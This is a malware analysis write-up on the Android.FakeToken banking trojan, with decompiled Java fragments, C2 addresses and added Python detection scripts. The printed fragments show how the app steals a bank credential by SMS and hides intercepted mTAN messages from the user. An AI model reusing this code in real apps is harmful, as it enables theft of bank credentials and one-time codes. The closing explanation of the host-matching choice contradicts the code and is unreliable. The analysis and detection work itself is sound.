Intro: What is Android.FakeToken?
This new malware family emerged a few days ago in a Spanish spam campaign and spreads through email and SMS messages. It tries to forward mTAN SMS messages to a remote attacker and thus provides the same man-in-the-mobile (mTAN interception) functionality we have already seen in the mobile components of Zeus and SpyEye, but it can also be controlled remotely and does not depend on the user's PC being infected first.
Analysis of the Application and Its Structure
When installing the app it requests the following permissions:
- android.permission.READ_PHONE_STATE
- android.permission.ACCESS_NETWORK_STATE
- android.permission.SEND_SMS
- android.permission.RECEIVE_SMS
- android.permission.INTERNET
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INSTALL_PACKAGES
- android.permission.DELETE_PACKAGES
- android.permission.READ_CONTACTS
- android.permission.RECEIVE_BOOT_COMPLETED
Once installation succeeds, the app's icon appears in the launcher and the application registers several broadcast receivers that fire on specific system events (for example BOOT_COMPLETED, USER_PRESENT, PHONE_STATE and SMS_RECEIVED). When the user launches the app, it shows a WebView component that displays an HTML page styled as a token generator of the targeted bank (in our case it is meant to look like Santander Consumer Bank):

```java
// Exposes the WebApi object to the page's JavaScript as window.android,
// so the bank-branded HTML can call back into the app.
localWebView.addJavascriptInterface(new WebApi(this), "android");
System.out.println("Build.VERSION.RELEASE: " + Build.VERSION.RELEASE);
// Android 2.3.1 and 2.3.3 get a separate copy of the page
if ((Build.VERSION.RELEASE.startsWith("2.3.1")) || (Build.VERSION.RELEASE.startsWith("2.3.3")))
  localWebView.loadUrl("file:///android_asset/html/index_bag.html");
....
```
To obtain the fake token (just a random number), the user must enter their first authentication factor. As soon as that happens, the application sends an SMS message to the author and then starts a background service:

```java
public void sendPass(String paramString) {
  try {
    if (!Settings.saved.sendInitSms) {
      Settings.saved.sendInitSms = true;
      // "<prefix> INIT <IMEI> <IMSI> <entered credential>", sent once to the configured number
      String str = Settings.saved.smsPrefix + " INIT " + MainApplication.imei + " " + MainApplication.imsi + " " + paramString;
      MainService.sendSms(Settings.saved.number, str);
      MainApplication.settings.save(this.context);
    }
....
```
This background service runs periodically and listens for commands from the remote server (for example a configuration update). When the victim's phone receives an SMS message, the receiver aborts the broadcast, so the message never reaches the user's messaging app, and forwards it to a configured phone number or remote server:

```java
abortBroadcast();   // stop the SMS_RECEIVED broadcast before the messaging app sees it
SmsMessage localSmsMessage = arrayOfSmsMessage[j];
String str1 = localSmsMessage.getOriginatingAddress();   // sender number
String str2 = localSmsMessage.getMessageBody();
// decide, from sender and body, whether this SMS is one worth stealing
CatchResult localCatchResult = MainApplication.settings.isCatchMessage(str1, str2);
if (localCatchResult.result)
  MainService.start(paramContext, paramIntent, "catch", str1, str2, localCatchResult.key);
// the SMS channel doubles as a control channel: new server address or delete command
if ((MainApplication.settings.isNewServer(paramContext, str1, str2)) || (MainApplication.settings.isDeleteMessage(str1, str2)))
```
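The permission list above and the SMS_RECEIVED receiver in the fragment are visible statically, before the sample is ever run. The following Python script is an added example of that triage step (analyst tooling, not code from the sample): it parses a decoded AndroidManifest.xml and reports the combination described in this write-up. The manifest embedded in it is constructed to mirror the sample; the receiver class names (SmsReceiver, BootReceiver) and the android:priority value are assumptions, since the original manifest is not reproduced on this page.

```python
"""Static triage of a decoded AndroidManifest.xml for the FakeToken pattern.

Added example for analysts, not code from the sample.  The embedded manifest is
CONSTRUCTED from the permissions and receivers described in the write-up; the
receiver class names and the priority value are assumptions."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def attr(name):
    """Namespaced attribute key ElementTree uses for android:<name>."""
    return "{%s}%s" % (ANDROID_NS, name)


SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="token.generator">
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
  <uses-permission android:name="android.permission.DELETE_PACKAGES"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Token Generator">
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.intent.action.USER_PRESENT"/>
        <action android:name="android.intent.action.PHONE_STATE"/>
      </intent-filter>
    </receiver>
    <service android:name=".MainService"/>
  </application>
</manifest>
"""

SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
BOOT_COMPLETED = "android.intent.action.BOOT_COMPLETED"


def parse_manifest(xml_text):
    """Return (set of requested permissions, list of receiver intent filters)."""
    root = ET.fromstring(xml_text)
    perms = {e.get(attr("name")) for e in root.findall("uses-permission")}
    filters = []
    for rcv in root.iter("receiver"):
        for flt in rcv.findall("intent-filter"):
            filters.append({
                "receiver": rcv.get(attr("name")),
                "actions": {act.get(attr("name")) for act in flt.findall("action")},
                "priority": int(flt.get(attr("priority"), "0")),  # default priority is 0
            })
    return perms, filters


def triage(xml_text):
    """Human-readable findings; an empty list means nothing of the pattern matched."""
    perms, filters = parse_manifest(xml_text)
    has = lambda short: "android.permission." + short in perms
    findings = []
    if has("RECEIVE_SMS") and has("SEND_SMS"):
        findings.append("RECEIVE_SMS + SEND_SMS: can read incoming mTANs and forward them by SMS")
    if has("READ_CONTACTS") and (has("INTERNET") or has("SEND_SMS")):
        findings.append("READ_CONTACTS with a network/SMS channel: address book can be exfiltrated")
    if has("INSTALL_PACKAGES") or has("DELETE_PACKAGES"):
        # Signature/system-level permissions: a sideloaded app is not actually granted
        # them, but requesting them at all is a dropper indicator.
        findings.append("INSTALL_PACKAGES/DELETE_PACKAGES requested (dropper behaviour)")
    for flt in filters:
        if SMS_RECEIVED in flt["actions"]:
            note = "%s listens for SMS_RECEIVED at priority %d" % (flt["receiver"], flt["priority"])
            if flt["priority"] > 0:
                # Before Android 4.4 SMS_RECEIVED was an ordered broadcast: the highest
                # priority receiver runs first and abortBroadcast() hides the SMS.
                note += ": runs before the stock SMS app and can abortBroadcast()"
            findings.append(note)
        if BOOT_COMPLETED in flt["actions"] and has("RECEIVE_BOOT_COMPLETED"):
            findings.append("%s restarts the service at boot" % flt["receiver"])
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_MANIFEST):
        print("-", line)
```

Run against a manifest decoded with apktool or a similar tool; the priority check is what distinguishes an SMS reader from an SMS hijacker on the Gingerbread-era devices this sample targets.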
The application sends the IMEI, IMSI, phone type, version, sid, phone number and the SMS body in an HTTP POST to one of the configured remote servers. The servers and all other required settings are stored in an XML configuration file (/data/data/token.generator/files/settings):
79021121067 1.0 santander http://icoolshop.ru/cp/server.php http://iconsshopbest.com/cp/server.php qe4faf23r4e2 sid_1 false 1331934321409 43200
This file can be updated remotely (via SMS or HTTP GET) if the author's phone number or server address changes. The malware can also install further APK files, and it sends the phone numbers of every entry in the victim's address book to a remote server, most likely to distribute the malware further.
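The sendPass() fragment above fixes the exact format of the first outbound SMS (prefix, the literal INIT, IMEI, IMSI, the entered credential), and the settings file names the controller's phone number and the two C2 URLs. The Python below is an added analyst example, not code from the sample: it decodes such a message out of a sandbox SMS capture, validates the IMEI's Luhn check digit, and matches proxy log lines against the known C2 hosts. The SMS capture and HTTP log are constructed for the example; the IMEI, IMSI and credential are made up, and using "santander" as the SMS prefix is an assumption based only on that string appearing in the settings file.

```python
"""Decode FakeToken's INIT exfiltration SMS and match traffic against its C2 list.

Added analyst example, not code from the sample.  The SMS capture and HTTP log
below are CONSTRUCTED; IMEI/IMSI/credential values are made up, and using
"santander" as the SMS prefix is an assumption."""
import re
from urllib.parse import urlsplit

# Taken from the settings file reproduced in the write-up.
C2_NUMBER = "79021121067"
C2_URLS = ["http://icoolshop.ru/cp/server.php",
           "http://iconsshopbest.com/cp/server.php"]
C2_HOSTS = {urlsplit(u).hostname for u in C2_URLS}

# smsPrefix + " INIT " + imei + " " + imsi + " " + credential, as built by sendPass()
INIT_RE = re.compile(
    r"^(?P<prefix>\S+) INIT (?P<imei>\d{14,16}) (?P<imsi>\d{6,15}) (?P<secret>.+)$")


def luhn_ok(digits):
    """Luhn check as used by the 15-digit IMEI (last digit is the check digit)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def decode_init_sms(destination, body):
    """Fields of an INIT message as a dict, or None if this SMS is not one."""
    m = INIT_RE.match(body.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["destination"] = destination
    fields["to_known_c2"] = destination.lstrip("+") == C2_NUMBER
    fields["imei_luhn_ok"] = len(fields["imei"]) == 15 and luhn_ok(fields["imei"])
    return fields


# Constructed sandbox capture: (destination number, message body)
CAPTURED_SMS = [
    ("+34600111222", "Hola, nos vemos a las 8"),
    ("79021121067", "santander INIT 490154203237518 214071234567890 s3cret"),
    ("79021121067", "santander INIT 123 456 x"),   # malformed: IMEI too short
]

# Constructed proxy log: "<method> <url>"
HTTP_LOG = [
    "GET http://www.santanderconsumer.es/",
    "POST http://icoolshop.ru/cp/server.php",
    "GET http://iconsshopbest.com/cp/server.php?a=1",
    "GET http://example.org/cp/server.php",
]


def init_messages(captured):
    """All decoded INIT messages found in a capture."""
    out = []
    for dest, body in captured:
        decoded = decode_init_sms(dest, body)
        if decoded:
            out.append(decoded)
    return out


def c2_hits(log_lines):
    """Log lines whose URL host is one of the known C2 hosts (path is ignored)."""
    hits = []
    for line in log_lines:
        parts = line.split(None, 1)
        if len(parts) == 2 and urlsplit(parts[1]).hostname in C2_HOSTS:
            hits.append(line)
    return hits


if __name__ == "__main__":
    for msg in init_messages(CAPTURED_SMS):
        print("credential %r for IMEI %s (luhn ok: %s) sent to %s"
              % (msg["secret"], msg["imei"], msg["imei_luhn_ok"], msg["destination"]))
    for line in c2_hits(HTTP_LOG):
        print("C2 contact:", line)
```

Matching on the host rather than the full URL is deliberate: the write-up notes that the server address can be swapped by a remote update, so the path (/cp/server.php) is the part most likely to survive a change, while a hit on either configured host is the stronger signal.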
Sample Information:
sha256:
f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79
md5:
4548973449f707a6359a9b321ef54d31